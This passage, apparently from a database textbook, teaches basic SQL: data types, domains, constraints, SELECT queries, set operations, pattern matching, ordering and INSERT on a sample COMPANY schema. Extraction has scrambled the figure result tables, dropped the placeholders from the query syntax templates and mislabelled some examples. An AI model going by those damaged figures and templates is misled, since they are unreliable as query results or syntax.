CLOB, the maximum length of a BLOB can be specified in kilobits (K),
megabits (M), or gigabits (G). For example, BLOB(30G) specifies a maxi-
mum length of 30 gigabits.

■ A Boolean data type has the traditional values of TRUE or FALSE. In SQL,
because of the presence of NULL values, a three-valued logic is used, so a
third possible value for a Boolean data type is UNKNOWN.

■ The DATE data type has ten positions, and its components are YEAR,
MONTH, and DAY in the form YYYY-MM-DD. The TIME data type has at
least eight positions, with the components HOUR, MINUTE, and SECOND in
the form HH:MM:SS. Only valid dates and times should be allowed by the
SQL implementation. This implies that months should be between 1 and 12
and dates must be between 1 and 31; furthermore, a date should be a valid
date for the corresponding month. The < (less than) comparison can be used with dates or times—an earlier date is considered to be smaller than a later date, and similarly with time. Literal values are represented by single-quoted strings preceded by the keyword DATE or TIME; for example, DATE ‘2008-09- 27’ or TIME ‘09:12:47’. In addition, a data type TIME(i), where i is called time fractional seconds precision, specifies i + 1 additional positions for TIME—one position for an additional period (.) separator character, and i positions for specifying decimal fractions of a second. A TIME WITH TIME ZONE data type includes an additional six positions for specifying the displacement from the standard universal time zone, which is in the range +13:00 to –12:59 in units of HOURS:MINUTES. If WITH TIME ZONE is not included, the default is the local time zone for the SQL session. Some additional data types are discussed below. The list of types discussed here is not exhaustive; different implementations have added more data types to SQL. ■ A timestamp data type (TIMESTAMP) includes the DATE and TIME fields, plus a minimum of six positions for decimal fractions of seconds and an optional WITH TIME ZONE qualifier. Literal values are represented by single- quoted strings preceded by the keyword TIMESTAMP, with a blank space between data and time; for example, TIMESTAMP ‘2008-09-27 09:12:47.648302’. ■ Another data type related to DATE, TIME, and TIMESTAMP is the INTERVAL data type. This specifies an interval—a relative value that can be used to increment or decrement an absolute value of a date, time, or timestamp. Intervals are qualified to be either YEAR/MONTH intervals or DAY/TIME intervals. 5Bit strings whose length is a multiple of 4 can be specified in hexadecimal notation, where the literal string is preceded by X and each hexadecimal character represents 4 bits. 88 Basic SQL The format of DATE, TIME, and TIMESTAMP can be considered as a special type of string. Hence, they can generally be used in string comparisons by being cast (or coerced or converted) into the equivalent strings. It is possible to specify the data type of each attribute directly, as in Figure 1; alter- natively, a domain can be declared, and the domain name used with the attribute specification. This makes it easier to change the data type for a domain that is used by numerous attributes in a schema, and improves schema readability. For example, we can create a domain SSN_TYPE by the following statement: CREATE DOMAIN SSN_TYPE AS CHAR(9); We can use SSN_TYPE in place of CHAR(9) in Figure 1 for the attributes Ssn and Super_ssn of EMPLOYEE, Mgr_ssn of DEPARTMENT, Essn of WORKS_ON, and Essn of DEPENDENT. A domain can also have an optional default specification via a DEFAULT clause, as we discuss later for attributes. Notice that domains may not be available in some implementations of SQL. 2 Specifying Constraints in SQL This section describes the basic constraints that can be specified in SQL as part of table creation. These include key and referential integrity constraints, restrictions on attribute domains and NULLs, and constraints on individual tuples within a rela- tion. 2.1 Specifying Attribute Constraints and Attribute Defaults Because SQL allows NULLs as attribute values, a constraint NOT NULL may be speci- fied if NULL is not permitted for a particular attribute. This is always implicitly spec- ified for the attributes that are part of the primary key of each relation, but it can be specified for any other attributes whose values are required not to be NULL, as shown in Figure 1. It is also possible to define a default value for an attribute by appending the clause DEFAULT to an attribute definition. The default value is included in any
new tuple if an explicit value is not provided for that attribute. Figure 2 illustrates an
example of specifying a default manager for a new department and a default depart-
ment for a new employee. If no default clause is specified, the default default value is
NULL for attributes that do not have the NOT NULL constraint.

Another type of constraint can restrict attribute or domain values using the CHECK
clause following an attribute or domain definition.6 For example, suppose that
department numbers are restricted to integer numbers between 1 and 20; then, we
can change the attribute declaration of Dnumber in the DEPARTMENT table (see
Figure 1) to the following:

Dnumber INT NOT NULL CHECK (Dnumber > 0 AND Dnumber < 21); 6The CHECK clause can also be used for other purposes, as we shall see. 89 Basic SQL CREATE TABLE EMPLOYEE ( . . . , Dno INT NOT NULL DEFAULT 1, CONSTRAINT EMPPK PRIMARY KEY (Ssn), CONSTRAINT EMPSUPERFK FOREIGN KEY (Super_ssn) REFERENCES EMPLOYEE(Ssn) ON DELETE SET NULL ON UPDATE CASCADE, CONSTRAINT EMPDEPTFK FOREIGN KEY(Dno) REFERENCES DEPARTMENT(Dnumber) ON DELETE SET DEFAULT ON UPDATE CASCADE); CREATE TABLE DEPARTMENT ( . . . , Mgr_ssn CHAR(9) NOT NULL DEFAULT ‘888665555’, . . . , CONSTRAINT DEPTPK PRIMARY KEY(Dnumber), CONSTRAINT DEPTSK UNIQUE (Dname), CONSTRAINT DEPTMGRFK FOREIGN KEY (Mgr_ssn) REFERENCES EMPLOYEE(Ssn) ON DELETE SET DEFAULT ON UPDATE CASCADE); CREATE TABLE DEPT_LOCATIONS ( . . . , PRIMARY KEY (Dnumber, Dlocation), FOREIGN KEY (Dnumber) REFERENCES DEPARTMENT(Dnumber) ON DELETE CASCADE ON UPDATE CASCADE); Figure 2 Example illustrating how default attribute values and referential integrity triggered actions are specified in SQL. The CHECK clause can also be used in conjunction with the CREATE DOMAIN state- ment. For example, we can write the following statement: CREATE DOMAIN D_NUM AS INTEGER CHECK (D_NUM > 0 AND D_NUM < 21); We can then use the created domain D_NUM as the attribute type for all attributes that refer to department numbers in Figure 1, such as Dnumber of DEPARTMENT, Dnum of PROJECT, Dno of EMPLOYEE, and so on. 2.2 Specifying Key and Referential Integrity Constraints Because keys and referential integrity constraints are very important, there are spe- cial clauses within the CREATE TABLE statement to specify them. Some examples to illustrate the specification of keys and referential integrity are shown in Figure 1.7 The PRIMARY KEY clause specifies one or more attributes that make up the primary key of a relation. If a primary key has a single attribute, the clause can follow the attribute directly. For example, the primary key of DEPARTMENT can be specified as follows (instead of the way it is specified in Figure 1): Dnumber INT PRIMARY KEY; 7Key and referential integrity constraints were not included in early versions of SQL. In some earlier implementations, keys were specified implicitly at the internal level via the CREATE INDEX command. 90 Basic SQL The UNIQUE clause specifies alternate (secondary) keys, as illustrated in the DEPARTMENT and PROJECT table declarations in Figure 1. The UNIQUE clause can also be specified directly for a secondary key if the secondary key is a single attrib- ute, as in the following example: Dname VARCHAR(15) UNIQUE; Referential integrity is specified via the FOREIGN KEY clause, as shown in Figure 1. A referential integrity constraint can be violated when tuples are inserted or deleted, or when a foreign key or primary key attribute value is modified. The default action that SQL takes for an integrity violation is to reject the update operation that will cause a violation, which is known as the RESTRICT option. However, the schema designer can specify an alternative action to be taken by attaching a referential trig- gered action clause to any foreign key constraint. The options include SET NULL, CASCADE, and SET DEFAULT. An option must be qualified with either ON DELETE or ON UPDATE. We illustrate this with the examples shown in Figure 2. Here, the database designer chooses ON DELETE SET NULL and ON UPDATE CASCADE for the foreign key Super_ssn of EMPLOYEE. This means that if the tuple for a supervising employee is deleted, the value of Super_ssn is automatically set to NULL for all employee tuples that were referencing the deleted employee tuple. On the other hand, if the Ssn value for a supervising employee is updated (say, because it was entered incorrectly), the new value is cascaded to Super_ssn for all employee tuples referencing the updated employee tuple.8 In general, the action taken by the DBMS for SET NULL or SET DEFAULT is the same for both ON DELETE and ON UPDATE: The value of the affected referencing attrib- utes is changed to NULL for SET NULL and to the specified default value of the refer- encing attribute for SET DEFAULT. The action for CASCADE ON DELETE is to delete all the referencing tuples, whereas the action for CASCADE ON UPDATE is to change the value of the referencing foreign key attribute(s) to the updated (new) primary key value for all the referencing tuples. It is the responsibility of the database designer to choose the appropriate action and to specify it in the database schema. As a general rule, the CASCADE option is suitable for “relationship” relations, such as WORKS_ON; for relations that represent multivalued attributes, such as DEPT_LOCATIONS; and for relations that represent weak entity types, such as DEPENDENT. 2.3 Giving Names to Constraints Figure 2 also illustrates how a constraint may be given a constraint name, following the keyword CONSTRAINT. The names of all constraints within a particular schema must be unique. A constraint name is used to identify a particular constraint in case 8Notice that the foreign key Super_ssn in the EMPLOYEE table is a circular reference and hence may have to be added later as a named constraint using the ALTER TABLE statement as we discussed at the end of Section 1.2. 91 Basic SQL the constraint must be dropped later and replaced with another constraint. Giving names to constraints is optional. 2.4 Specifying Constraints on Tuples Using CHECK In addition to key and referential integrity constraints, which are specified by spe- cial keywords, other table constraints can be specified through additional CHECK clauses at the end of a CREATE TABLE statement. These can be called tuple-based constraints because they apply to each tuple individually and are checked whenever a tuple is inserted or modified. For example, suppose that the DEPARTMENT table in Figure 1 had an additional attribute Dept_create_date, which stores the date when the department was created. Then we could add the following CHECK clause at the end of the CREATE TABLE statement for the DEPARTMENT table to make sure that a manager’s start date is later than the department creation date. CHECK (Dept_create_date <= Mgr_start_date); The CHECK clause can also be used to specify more general constraints using the CREATE ASSERTION statement of SQL. We do not discuss this in this chapter because it requires the full power of queries, which are not completely fleshed out here. 3 Basic Retrieval Queries in SQL SQL has one basic statement for retrieving information from a database: the SELECT statement. The SELECT statement is not the same as the SELECT operation of relational algebra. There are many options and flavors to the SELECT statement in SQL, so we will introduce its features gradually. We will use sample queries spec- ified on the schema of Figure A.2 and will refer to the sample database state shown in Figure A.3 to show the results of some of the sample queries. In this section, we present the features of SQL for simple retrieval queries. Before proceeding, we must point out an important distinction between SQL and the formal relational model: SQL allows a table (relation) to have two or more tuples that are identical in all their attribute values. Hence, in general, an SQL table is not a set of tuples, because a set does not allow two identical members; rather, it is a multiset (sometimes called a bag) of tuples. Some SQL relations are constrained to be sets because a key constraint has been declared or because the DISTINCT option has been used with the SELECT statement (described later in this section). We should be aware of this distinction as we discuss the examples. 3.1 The SELECT-FROM-WHERE Structure of Basic SQL Queries Queries in SQL can be very complex. We will start with simple queries, and then progress to more complex ones in a step-by-step manner. The basic form of the SELECT statement, sometimes called a mapping or a select-from-where block, is 92 Basic SQL formed of the three clauses SELECT, FROM, and WHERE and has the following form:9 SELECT
FROM

WHERE ;

where

is a list of attribute names whose values are to be retrieved by
the query.

is a list of the relation names required to process the query.

is a conditional (Boolean) expression that identifies the tuples
to be retrieved by the query.

In SQL, the basic logical comparison operators for comparing attribute values with
one another and with literal constants are =, <, <=, >, >=, and <>. These corre-
spond to the relational algebra operators =, <, ≤, >, ≥, and ≠, respectively, and to the
C/C++ programming language operators =, <, <=, >, >=, and !=. The main syntac-
tic difference is the not equal operator. SQL has additional comparison operators
that we will present gradually.

We illustrate the basic SELECT statement in SQL with some sample queries.

Query 0. Retrieve the birth date and address of the employee(s) whose name
is ‘John B. Smith’.

Q0: SELECT Bdate, Address
FROM EMPLOYEE
WHERE Fname=‘John’ AND Minit=‘B’ AND Lname=‘Smith’;

This query involves only the EMPLOYEE relation listed in the FROM clause. The
query selects the individual EMPLOYEE tuples that satisfy the condition of the
WHERE clause, then projects the result on the Bdate and Address attributes listed in
the SELECT clause.

The SELECT clause of SQL specifies the attributes whose values are to be retrieved,
which are called the projection attributes, and the WHERE clause specifies the
Boolean condition that must be true for any retrieved tuple, which is known as the
selection condition. Figure 3(a) shows the result of query Q0 on the database of
Figure A.3.

We can think of an implicit tuple variable or iterator in the SQL query ranging or
looping over each individual tuple in the EMPLOYEE table and evaluating the condi-
tion in the WHERE clause. Only those tuples that satisfy the condition—that is,

9The SELECT and FROM clauses are required in all SQL queries. The WHERE is optional (see Section
3.3).

93

Basic SQL

(a) Bdate

1965-01-09 731Fondren, Houston, TX

Address (b) Fname

John

Franklin

Ramesh

Joyce

Smith

Wong

Narayan

English

731 Fondren, Houston, TX

638 Voss, Houston, TX

975 Fire Oak, Humble, TX

5631 Rice, Houston, TX

Lname Address

(d) E.Fname

John

Franklin

Alicia Zelaya

Joyce

Ramesh

Jennifer Wallace

Ahmad Jabbar

Smith

Wong

Narayan

English

Jennifer

James

Jennifer

Franklin

James

Franklin

Franklin

Wallace

Borg

Wallace

Wong

Borg

Wong

Wong

E.Lname S.Fname S.Lname

Fname

John

Franklin

K

Joyce

Ramesh

A

B

T

M

F

M

M

5

5

5

5

38000

25000

30000

40000

333445555

333445555

333445555

888665555

Narayan

English

Smith

Wong

975 Fire Oak, Humble, TX

5631 Rice, Houston, TX

731 Fondren, Houston, TX

638 Voss, Houston, TX

1962-09-15

1972-07-31

1965-09-01

1955-12-08

666884444

453453453

123456789

333445555

Minit Lname Ssn Bdate Address Sex DnoSalary Super_ssn

(g)

(e) E.Fname

123456789

333445555

999887777

453453453

666884444

987654321

987987987

888665555

(c) Pnumber

10

30

1941-06-20

1941-06-20

4

4

Wallace 291Berry, Bellaire, TX

291Berry, Bellaire, TXWallace

Dnum Lname BdateAddress (f) Ssn

123456789

333445555

999887777

453453453

666884444

987654321

987987987

888665555

123456789

333445555

999887777

453453453

666884444

987654321

987987987

888665555

123456789

333445555

999887777

453453453

666884444

987654321

987987987

888665555

Research

Research

Research

Research

Research

Research

Research

Research

Administration

Administration

Administration

Administration

Administration

Administration

Administration

Administration

Headquarters

Headquarters

Headquarters

Headquarters

Headquarters

Headquarters

Headquarters

Headquarters

Dname

Figure 3
Results of SQL queries when applied to the COMPANY database state shown
in Figure 3.6. (a) Q0. (b) Q1. (c) Q2. (d) Q8. (e) Q9. (f) Q10. (g) Q1C.

94

those tuples for which the condition evaluates to TRUE after substituting their cor-
responding attribute values—are selected.

Query 1. Retrieve the name and address of all employees who work for the
‘Research’ department.

Q1: SELECT Fname, Lname, Address
FROM EMPLOYEE, DEPARTMENT
WHERE Dname=‘Research’ AND Dnumber=Dno;

In the WHERE clause of Q1, the condition Dname = ‘Research’ is a selection condi-
tion that chooses the particular tuple of interest in the DEPARTMENT table, because
Dname is an attribute of DEPARTMENT. The condition Dnumber = Dno is called a
join condition, because it combines two tuples: one from DEPARTMENT and one
from EMPLOYEE, whenever the value of Dnumber in DEPARTMENT is equal to the
value of Dno in EMPLOYEE. The result of query Q1 is shown in Figure 3(b). In gen-
eral, any number of selection and join conditions may be specified in a single SQL
query.

A query that involves only selection and join conditions plus projection attributes is
known as a select-project-join query. The next example is a select-project-join
query with two join conditions.

Query 2. For every project located in ‘Stafford’, list the project number, the
controlling department number, and the department manager’s last name,
address, and birth date.

Q2: SELECT Pnumber, Dnum, Lname, Address, Bdate
FROM PROJECT, DEPARTMENT, EMPLOYEE
WHERE Dnum=Dnumber AND Mgr_ssn=Ssn AND

Plocation=‘Stafford’;

The join condition Dnum = Dnumber relates a project tuple to its controlling depart-
ment tuple, whereas the join condition Mgr_ssn = Ssn relates the controlling depart-
ment tuple to the employee tuple who manages that department. Each tuple in the
result will be a combination of one project, one department, and one employee that
satisfies the join conditions. The projection attributes are used to choose the attrib-
utes to be displayed from each combined tuple. The result of query Q2 is shown in
Figure 3(c).

3.2 Ambiguous Attribute Names, Aliasing,
Renaming, and Tuple Variables

In SQL, the same name can be used for two (or more) attributes as long as the attrib-
utes are in different relations. If this is the case, and a multitable query refers to two or
more attributes with the same name, we must qualify the attribute name with the
relation name to prevent ambiguity. This is done by prefixing the relation name to
the attribute name and separating the two by a period. To illustrate this, suppose that
in Figures A.2 and A.3 the Dno and Lname attributes of the EMPLOYEE relation were

Basic SQL

95

called Dnumber and Name, and the Dname attribute of DEPARTMENT was also called
Name; then, to prevent ambiguity, query Q1 would be rephrased as shown in Q1A. We
must prefix the attributes Name and Dnumber in Q1A to specify which ones we are
referring to, because the same attribute names are used in both relations:

Q1A: SELECT Fname, EMPLOYEE.Name, Address
FROM EMPLOYEE, DEPARTMENT
WHERE DEPARTMENT.Name=‘Research’ AND

DEPARTMENT.Dnumber=EMPLOYEE.Dnumber;

Fully qualified attribute names can be used for clarity even if there is no ambiguity
in attribute names. Q1 is shown in this manner as is Q1� below. We can also create
an alias for each table name to avoid repeated typing of long table names (see Q8
below).

Q1�: SELECT EMPLOYEE.Fname, EMPLOYEE.LName,
EMPLOYEE.Address

FROM EMPLOYEE, DEPARTMENT
WHERE DEPARTMENT.DName=‘Research’ AND

DEPARTMENT.Dnumber=EMPLOYEE.Dno;

The ambiguity of attribute names also arises in the case of queries that refer to the
same relation twice, as in the following example.

Query 8. For each employee, retrieve the employee’s first and last name and
the first and last name of his or her immediate supervisor.

Q8: SELECT E.Fname, E.Lname, S.Fname, S.Lname
FROM EMPLOYEE AS E, EMPLOYEE AS S
WHERE E.Super_ssn=S.Ssn;

In this case, we are required to declare alternative relation names E and S, called
aliases or tuple variables, for the EMPLOYEE relation. An alias can follow the key-
word AS, as shown in Q8, or it can directly follow the relation name—for example,
by writing EMPLOYEE E, EMPLOYEE S in the FROM clause of Q8. It is also possible
to rename the relation attributes within the query in SQL by giving them aliases.
For example, if we write

EMPLOYEE AS E(Fn, Mi, Ln, Ssn, Bd, Addr, Sex, Sal, Sssn, Dno)

in the FROM clause, Fn becomes an alias for Fname, Mi for Minit, Ln for Lname, and so
on.

In Q8, we can think of E and S as two different copies of the EMPLOYEE relation; the
first, E, represents employees in the role of supervisees or subordinates; the second,
S, represents employees in the role of supervisors. We can now join the two copies.
Of course, in reality there is only one EMPLOYEE relation, and the join condition is
meant to join the relation with itself by matching the tuples that satisfy the join con-
dition E.Super_ssn = S.Ssn. Notice that this is an example of a one-level recursive
query. In earlier versions of SQL, it was not possible to specify a general recursive

Basic SQL

96

Basic SQL

query, with an unknown number of levels, in a single SQL statement. A construct
for specifying recursive queries has been incorporated into SQL:1999.

The result of query Q8 is shown in Figure 3(d). Whenever one or more aliases are
given to a relation, we can use these names to represent different references to that
same relation. This permits multiple references to the same relation within a query.

We can use this alias-naming mechanism in any SQL query to specify tuple vari-
ables for every table in the WHERE clause, whether or not the same relation needs to
be referenced more than once. In fact, this practice is recommended since it results
in queries that are easier to comprehend. For example, we could specify query Q1 as
in Q1B:

Q1B: SELECT E.Fname, E.LName, E.Address
FROM EMPLOYEE E, DEPARTMENT D
WHERE D.DName=‘Research’ AND D.Dnumber=E.Dno;

3.3 Unspecified WHERE Clause
and Use of the Asterisk

We discuss two more features of SQL here. A missing WHERE clause indicates no
condition on tuple selection; hence, all tuples of the relation specified in the FROM
clause qualify and are selected for the query result. If more than one relation is spec-
ified in the FROM clause and there is no WHERE clause, then the CROSS
PRODUCT—all possible tuple combinations—of these relations is selected. For
example, Query 9 selects all EMPLOYEE Ssns (Figure 3(e)), and Query 10 selects all
combinations of an EMPLOYEE Ssn and a DEPARTMENT Dname, regardless of
whether the employee works for the department or not (Figure 3(f)).

Queries 9 and 10. Select all EMPLOYEE Ssns (Q9) and all combinations of
EMPLOYEE Ssn and DEPARTMENT Dname (Q10) in the database.

Q9: SELECT Ssn
FROM EMPLOYEE;

Q10: SELECT Ssn, Dname
FROM EMPLOYEE, DEPARTMENT;

It is extremely important to specify every selection and join condition in the
WHERE clause; if any such condition is overlooked, incorrect and very large rela-
tions may result. Notice that Q10 is similar to a CROSS PRODUCT operation fol-
lowed by a PROJECT operation in relational algebra. If we specify all the attributes
of EMPLOYEE and DEPARTMENT in Q10, we get the actual CROSS PRODUCT
(except for duplicate elimination, if any).

To retrieve all the attribute values of the selected tuples, we do not have to list the
attribute names explicitly in SQL; we just specify an asterisk (*), which stands for all
the attributes. For example, query Q1C retrieves all the attribute values of any
EMPLOYEE who works in DEPARTMENT number 5 (Figure 3(g)), query Q1D
retrieves all the attributes of an EMPLOYEE and the attributes of the DEPARTMENT in

97

Basic SQL

which he or she works for every employee of the ‘Research’ department, and Q10A
specifies the CROSS PRODUCT of the EMPLOYEE and DEPARTMENT relations.

Q1C: SELECT *
FROM EMPLOYEE
WHERE Dno=5;

Q1D: SELECT *
FROM EMPLOYEE, DEPARTMENT
WHERE Dname=‘Research’ AND Dno=Dnumber;

Q10A: SELECT *
FROM EMPLOYEE, DEPARTMENT;

3.4 Tables as Sets in SQL
As we mentioned earlier, SQL usually treats a table not as a set but rather as a
multiset; duplicate tuples can appear more than once in a table, and in the result of a
query. SQL does not automatically eliminate duplicate tuples in the results of
queries, for the following reasons:

■ Duplicate elimination is an expensive operation. One way to implement it is
to sort the tuples first and then eliminate duplicates.

■ The user may want to see duplicate tuples in the result of a query.

■ When an aggregate function is applied to tuples, in most cases we do not
want to eliminate duplicates.

An SQL table with a key is restricted to being a set, since the key value must be dis-
tinct in each tuple.10 If we do want to eliminate duplicate tuples from the result of
an SQL query, we use the keyword DISTINCT in the SELECT clause, meaning that
only distinct tuples should remain in the result. In general, a query with SELECT
DISTINCT eliminates duplicates, whereas a query with SELECT ALL does not.
Specifying SELECT with neither ALL nor DISTINCT—as in our previous examples—
is equivalent to SELECT ALL. For example, Q11 retrieves the salary of every
employee; if several employees have the same salary, that salary value will appear as
many times in the result of the query, as shown in Figure 4(a). If we are interested
only in distinct salary values, we want each value to appear only once, regardless of
how many employees earn that salary. By using the keyword DISTINCT as in Q11A,
we accomplish this, as shown in Figure 4(b).

Query 11. Retrieve the salary of every employee (Q11) and all distinct salary
values (Q11A).

Q11: SELECT ALL Salary
FROM EMPLOYEE;

Q11A: SELECT DISTINCT Salary
FROM EMPLOYEE;

10In general, an SQL table is not required to have a key, although in most cases there will be one.

98

Basic SQL

(b)Salary

30000

40000

25000

43000

38000

25000

25000

55000

(c)(a) Salary

30000

40000

25000

43000

38000

55000

Fname Lname

(d) Fname Lname

James Borg

Figure 4
Results of additional
SQL queries when
applied to the COM-
PANY database state
shown in Figure A.3.
(a) Q11. (b) Q11A.
(c) Q16. (d) Q18.

SQL has directly incorporated some of the set operations from mathematical set
theory, which are also part of relational algebra (see Chapter 6). There are set union
(UNION), set difference (EXCEPT),11 and set intersection (INTERSECT) operations.
The relations resulting from these set operations are sets of tuples; that is, duplicate
tuples are eliminated from the result. These set operations apply only to union-com-
patible relations, so we must make sure that the two relations on which we apply the
operation have the same attributes and that the attributes appear in the same order
in both relations. The next example illustrates the use of UNION.

Query 4. Make a list of all project numbers for projects that involve an
employee whose last name is ‘Smith’, either as a worker or as a manager of the
department that controls the project.

Q4A: (SELECT DISTINCT Pnumber
FROM PROJECT, DEPARTMENT, EMPLOYEE
WHERE Dnum=Dnumber AND Mgr_ssn=Ssn

AND Lname=‘Smith’ )
UNION

( SELECT DISTINCT Pnumber
FROM PROJECT, WORKS_ON, EMPLOYEE
WHERE Pnumber=Pno AND Essn=Ssn

AND Lname=‘Smith’ );

The first SELECT query retrieves the projects that involve a ‘Smith’ as manager of
the department that controls the project, and the second retrieves the projects that
involve a ‘Smith’ as a worker on the project. Notice that if several employees have the
last name ‘Smith’, the project names involving any of them will be retrieved.
Applying the UNION operation to the two SELECT queries gives the desired result.

SQL also has corresponding multiset operations, which are followed by the keyword
ALL (UNION ALL, EXCEPT ALL, INTERSECT ALL). Their results are multisets (dupli-
cates are not eliminated). The behavior of these operations is illustrated by the
examples in Figure 5. Basically, each tuple—whether it is a duplicate or not—is con-
sidered as a different tuple when applying these operations.

11In some systems, the keyword MINUS is used for the set difference operation instead of EXCEPT.

99

Basic SQL

T(b)

A

a1

a1

a2

a2

a2

a3

a4

a5

T(c)

A

a2

a3

T(d)

A

a1

a2

R(a)

A

a1

a2

a2

a3

S

A

a1

a2

a4

a5
Figure 5
The results of SQL multiset
operations. (a) Two tables,
R(A) and S(A). (b) R(A)
UNION ALL S(A). (c) R(A)
EXCEPT ALL S(A). (d) R(A)
INTERSECT ALL S(A).

3.5 Substring Pattern Matching and Arithmetic Operators
In this section we discuss several more features of SQL. The first feature allows com-
parison conditions on only parts of a character string, using the LIKE comparison
operator. This can be used for string pattern matching. Partial strings are specified
using two reserved characters: % replaces an arbitrary number of zero or more
characters, and the underscore (_) replaces a single character. For example, consider
the following query.

Query 12. Retrieve all employees whose address is in Houston, Texas.

Q12: SELECT Fname, Lname
FROM EMPLOYEE
WHERE Address LIKE ‘%Houston,TX%’;

To retrieve all employees who were born during the 1950s, we can use Query Q12A.
Here, ‘5’ must be the third character of the string (according to our format for date),
so we use the value ‘_ _ 5 _ _ _ _ _ _ _’, with each underscore serving as a placeholder
for an arbitrary character.

Query 12A. Find all employees who were born during the 1950s.

Q12: SELECT Fname, Lname
FROM EMPLOYEE
WHERE Bdate LIKE ‘_ _ 5 _ _ _ _ _ _ _’;

If an underscore or % is needed as a literal character in the string, the character
should be preceded by an escape character, which is specified after the string using
the keyword ESCAPE. For example, ‘AB\_CD\%EF’ ESCAPE ‘\’ represents the literal
string ‘AB_CD%EF’ because \ is specified as the escape character. Any character not
used in the string can be chosen as the escape character. Also, we need a rule to
specify apostrophes or single quotation marks (‘ ’) if they are to be included in a
string because they are used to begin and end strings. If an apostrophe (’) is needed,
it is represented as two consecutive apostrophes (”) so that it will not be interpreted
as ending the string. Notice that substring comparison implies that attribute values

100

Basic SQL

are not atomic (indivisible) values, as one would assume in the formal relational
model.

Another feature allows the use of arithmetic in queries. The standard arithmetic
operators for addition (+), subtraction (–), multiplication (*), and division (/) can
be applied to numeric values or attributes with numeric domains. For example,
suppose that we want to see the effect of giving all employees who work on the
‘ProductX’ project a 10 percent raise; we can issue Query 13 to see what their
salaries would become. This example also shows how we can rename an attribute in
the query result using AS in the SELECT clause.

Query 13. Show the resulting salaries if every employee working on the
‘ProductX’ project is given a 10 percent raise.

Q13: SELECT E.Fname, E.Lname, 1.1 * E.Salary AS Increased_sal
FROM EMPLOYEE AS E, WORKS_ON AS W, PROJECT AS P
WHERE E.Ssn=W.Essn AND W.Pno=P.Pnumber AND

P.Pname=‘ProductX’;

For string data types, the concatenate operator || can be used in a query to append
two string values. For date, time, timestamp, and interval data types, operators
include incrementing (+) or decrementing (–) a date, time, or timestamp by an
interval. In addition, an interval value is the result of the difference between two
date, time, or timestamp values. Another comparison operator, which can be used
for convenience, is BETWEEN, which is illustrated in Query 14.

Query 14. Retrieve all employees in department 5 whose salary is between
$30,000 and $40,000.

Q14: SELECT *
FROM EMPLOYEE
WHERE (Salary BETWEEN 30000 AND 40000) AND Dno = 5;

The condition (Salary BETWEEN 30000 AND 40000) in Q14 is equivalent to the con-
dition ((Salary >= 30000) AND (Salary <= 40000)). 3.6 Ordering of Query Results SQL allows the user to order the tuples in the result of a query by the values of one or more of the attributes that appear in the query result, by using the ORDER BY clause. This is illustrated by Query 15. Query 15. Retrieve a list of employees and the projects they are working on, ordered by department and, within each department, ordered alphabetically by last name, then first name. Q15: SELECT D.Dname, E.Lname, E.Fname, P.Pname FROM DEPARTMENT D, EMPLOYEE E, WORKS_ON W, PROJECT P WHERE D.Dnumber= E.Dno AND E.Ssn= W.Essn AND W.Pno= P.Pnumber ORDER BY D.Dname, E.Lname, E.Fname; 101 Basic SQL The default order is in ascending order of values. We can specify the keyword DESC if we want to see the result in a descending order of values. The keyword ASC can be used to specify ascending order explicitly. For example, if we want descending alphabetical order on Dname and ascending order on Lname, Fname, the ORDER BY clause of Q15 can be written as ORDER BY D.Dname DESC, E.Lname ASC, E.Fname ASC 3.7 Discussion and Summary of Basic SQL Retrieval Queries A simple retrieval query in SQL can consist of up to four clauses, but only the first two—SELECT and FROM—are mandatory. The clauses are specified in the follow- ing order, with the clauses between square brackets [ ... ] being optional: SELECT
FROM

[ WHERE ]
[ ORDER BY ];

The SELECT clause lists the attributes to be retrieved, and the FROM clause specifies
all relations (tables) needed in the simple query. The WHERE clause identifies the
conditions for selecting the tuples from these relations, including join conditions if
needed. ORDER BY specifies an order for displaying the results of a query. Two addi-
tional clauses not detailed here are GROUP BY and HAVING.

There are more complex features of SQL retrieval queries. These include the follow-
ing: nested queries that allow one query to be included as part of another query;
aggregate functions that are used to provide summaries of the information in the
tables; two additional clauses (GROUP BY and HAVING) that can be used to provide
additional power to aggregate functions; and various types of joins that can com-
bine records from various tables in different ways.

4 INSERT, DELETE, and UPDATE
Statements in SQL

In SQL, three commands can be used to modify the database: INSERT, DELETE, and
UPDATE. We discuss each of these in turn.

4.1 The INSERT Command
In its simplest form, INSERT is used to add a single tuple to a relation. We must spec-
ify the relation name and a list of values for the tuple. The values should be listed in
the same order in which the corresponding attributes were specified in the CREATE
TABLE command. For example, to add a new tuple to the EMPLOYEE relation shown

102

Basic SQL

in Figure A.2 and specified in the CREATE TABLE EMPLOYEE … command in Figure
1, we can use U1:

U1: INSERT INTO EMPLOYEE
VALUES ( ‘Richard’, ‘K’, ‘Marini’, ‘653298653’, ‘1962-12-30’, ‘98

Oak Forest, Katy, TX’, ‘M’, 37000, ‘653298653’, 4 );

A second form of the INSERT statement allows the user to specify explicit attribute
names that correspond to the values provided in the INSERT command. This is use-
ful if a relation has many attributes but only a few of those attributes are assigned
values in the new tuple. However, the values must include all attributes with NOT
NULL specification and no default value. Attributes with NULL allowed or DEFAULT
values are the ones that can be left out. For example, to enter a tuple for a new
EMPLOYEE for whom we know only the Fname, Lname, Dno, and Ssn attributes, we
can use U1A:

U1A: INSERT INTO EMPLOYEE (Fname, Lname, Dno, Ssn)
VALUES (‘Richard’, ‘Marini’, 4, ‘653298653’);

Attributes not specified in U1A are set to their DEFAULT or to NULL, and the values
are listed in the same order as the attributes are listed in the INSERT command itself.
It is also possible to insert into a relation multiple tuples separated by commas in a
single INSERT command. The attribute values forming each tuple are enclosed in
parentheses.

A DBMS that fully implements SQL should support and enforce all the integrity
constraints that can be specified in the DDL. For example, if we issue the command
in U2 on the database shown in Figure A.3, the DBMS should reject the operation
because no DEPARTMENT tuple exists in the database with Dnumber = 2. Similarly,
U2A would be rejected because no Ssn value is provided and it is the primary key,
which cannot be NULL.

U3: INSERT INTO EMPLOYEE (Fname, Lname, Ssn, Dno)
VALUES (‘Robert’, ‘Hatcher’, ‘980760540’, 2);
(U2 is rejected if referential integrity checking is provided by DBMS.)

U2A: INSERT INTO EMPLOYEE (Fname, Lname, Dno)
VALUES (‘Robert’, ‘Hatcher’, 5);
(U2A is rejected if NOT NULL checking is provided by DBMS.)

A variation of the INSERT command inserts multiple tuples into a relation in con-
junction with creating the relation and loading it with the result of a query. For
example, to create a temporary table that has the employee last name, project name,
and hours per week for each employee working on a project, we can write the state-
ments in U3A and U3B:

U3A: CREATE TABLE WORKS_ON_INFO
( Emp_name VARCHAR(15),

Proj_name VARCHAR(15),
Hours_per_week DECIMAL(3,1) );

103

Basic SQL

